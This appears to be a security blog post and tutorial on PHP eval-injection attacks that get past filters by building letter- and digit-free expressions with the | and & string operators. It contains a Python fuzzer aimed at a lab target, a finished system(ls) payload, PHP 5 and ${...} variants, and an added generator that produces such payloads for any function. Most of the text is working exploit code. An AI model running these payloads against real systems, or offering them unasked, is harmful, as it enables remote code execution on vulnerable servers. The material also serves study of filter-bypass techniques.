Using | and & to build a letter- and digit-free webshell

Posted on 2020-06-05, 2 min read
import string
import requests
from urllib.parse import quote

TARGET = 'http://192.168.0.134/?code='   # lab box that eval()s the code parameter
# Characters the payload must not contain (letters and digits), plus the two
# bytes that would end or escape a single-quoted PHP string.
BLOCKED = set(string.ascii_letters + string.digits) | {"'", '\\'}

def candidates():
    """Every byte 0x00-0xFF that may appear inside the payload string."""
    return [b for b in range(256) if chr(b) not in BLOCKED]

def fuzz(op):
    """Ask the target to evaluate ('\\xAA' op '\\xBB') for every allowed byte
    pair and print what PHP's bytewise string operator produced."""
    for a in candidates():
        for b in candidates():
            left, right = '%%%02X' % a, '%%%02X' % b
            # quote() turns '&' into %26 so it does not split the query string
            code = "echo ('%s'%s'%s');" % (left, quote(op), right)
            try:
                result = requests.get(TARGET + code, timeout=5).text
            except requests.RequestException:
                continue
            print(left + op + right + '=' + result)

if __name__ == '__main__':
    fuzz('|')   # a|b: the bits of both bytes combined
    fuzz('&')   # a&b: only the bits both bytes share

Picking pairs from the fuzzer output gives this payload:

(%27%13%19%13%14%05%0D%27|%27``````%27)(%27%0C%13%27|%27``%27)

The first bracket ORs to the string system and the second to ls, so PHP evaluates it as system(ls).

PHP 5 does not accept the (system)(ls) form, that is, calling a parenthesised string expression directly.

On PHP 5 write it as ($a='system').($a(ls)) instead: assign the string to a variable and call that variable as a function; the concatenation operator only serves to chain the two expressions. Note that $a itself contains a letter; $_ is a valid PHP variable name that keeps the payload free of letters and digits.

Code can also be executed with

${phpinfo()}

The parentheses play the same role as the quotes around a string: they turn whatever they enclose into one unit, so the parser can tell where one expression ends and the next begins, as in the (...).(...) pattern above. ${} is PHP's variable-variable syntax: the expression inside the braces is evaluated first, so phpinfo() actually runs, and only then is its result used as the name of the variable being accessed.
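The following generator, an added example that is not the post's own tooling, turns the fuzzer's idea into an offline routine: for each byte of a target word it searches for the smallest pair of non-alphanumeric bytes whose | (or &) equals that byte, emits the ('...'|'...') expression, and wraps it in the PHP 7 ("func")("arg") form, the PHP 5 ($_=...).($_(...)) form, and the ${...} variable-variable form. It also models PHP's bytewise string operators so the result can be checked locally. The ALNUM/UNSAFE sets, the $_ variable name and all helper names are this example's own choices; POST_PAYLOAD is the post's system(ls) payload copied in for comparison.

```python
"""Build letter- and digit-free PHP call expressions with the | and & string operators.

Added example, not the post's code. It assumes the target eval()s a ?code=
parameter, as the post's fuzzer does.
"""
import string
from urllib.parse import quote, unquote_to_bytes

ALNUM = frozenset(string.ascii_letters + string.digits)
# Bytes that would end or escape a single-quoted PHP string (assumption: never used as data).
UNSAFE = frozenset((ord("'"), ord("\\")))
OPS = {"|": lambda a, b: a | b, "&": lambda a, b: a & b}

# The post's own payload for system(ls), kept to check that the generator reproduces it.
POST_PAYLOAD = "(%27%13%19%13%14%05%0D%27|%27``````%27)(%27%0C%13%27|%27``%27)"


def allowed(byte):
    """True if the byte may appear inside a payload string."""
    return chr(byte) not in ALNUM and byte not in UNSAFE


def find_pair(target, op):
    """Smallest allowed pair (a, b), a varied slowest, with a <op> b == target."""
    fn = OPS[op]
    for a in filter(allowed, range(256)):
        for b in filter(allowed, range(256)):
            if fn(a, b) == target:
                return a, b
    raise ValueError("no %s pair yields byte 0x%02x" % (op, target))


def split_word(word, op):
    """Two byte strings whose bytewise <op> gives word back."""
    pairs = [find_pair(c, op) for c in word.encode()]
    return bytes(a for a, _ in pairs), bytes(b for _, b in pairs)


def php_bitwise(left, right, op):
    """Model PHP's string | and &: applied byte by byte; & stops at the shorter
    operand, | keeps the tail of the longer operand unchanged."""
    fn = OPS[op]
    n = min(len(left), len(right))
    out = bytes(fn(a, b) for a, b in zip(left, right))
    return out if op == "&" else out + left[n:] + right[n:]


def string_expr(word, op):
    """PHP source ('<left>'<op>'<right>') that evaluates to word."""
    left, right = split_word(word, op)
    return b"('" + left + b"'" + op.encode() + b"'" + right + b"')"


def call_expr(func, arg, op="|"):
    """PHP 7 form ("func")("arg"), e.g. system("ls")."""
    return string_expr(func, op) + string_expr(arg, op)


def php5_call_expr(func, arg, op="|"):
    """PHP 5 cannot call a parenthesised string directly; store it in $_ and call
    that as a variable function. $_ is a valid name with no letters or digits."""
    return b"($_=" + string_expr(func, op) + b").($_(" + string_expr(arg, op) + b"))"


def varvar_stmt(expr):
    """Wrap an expression in ${...}: PHP evaluates it (running the call) before
    using the result as a variable name, like the post's ${phpinfo()}."""
    return b"${" + expr + b"};"


def encode(src):
    """Percent-encode PHP source for the ?code= parameter; only ( and ) stay literal."""
    return quote(src, safe="()")


def decode(payload):
    """Inverse of encode(); also decodes the post's hand-written payload."""
    return unquote_to_bytes(payload)


def has_alnum(src):
    """True if any byte of the PHP source is an ASCII letter or digit."""
    return any(chr(b) in ALNUM for b in src)


if __name__ == "__main__":
    for op in OPS:
        src = call_expr("system", "ls", op)
        print(op, encode(src), php_bitwise(*split_word("system", op), op))
    print(encode(php5_call_expr("system", "ls")))
    print(encode(varvar_stmt(call_expr("system", "ls"))))
```

Because find_pair scans the low byte first and takes the first non-alphanumeric partner, the | variant lands on exactly the control-byte/backtick pairs in the post's payload; the & variant instead needs bytes that are supersets of the target, so it produces bytes above 0x7F, which is why everything is percent-encoded before it goes into the query string.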
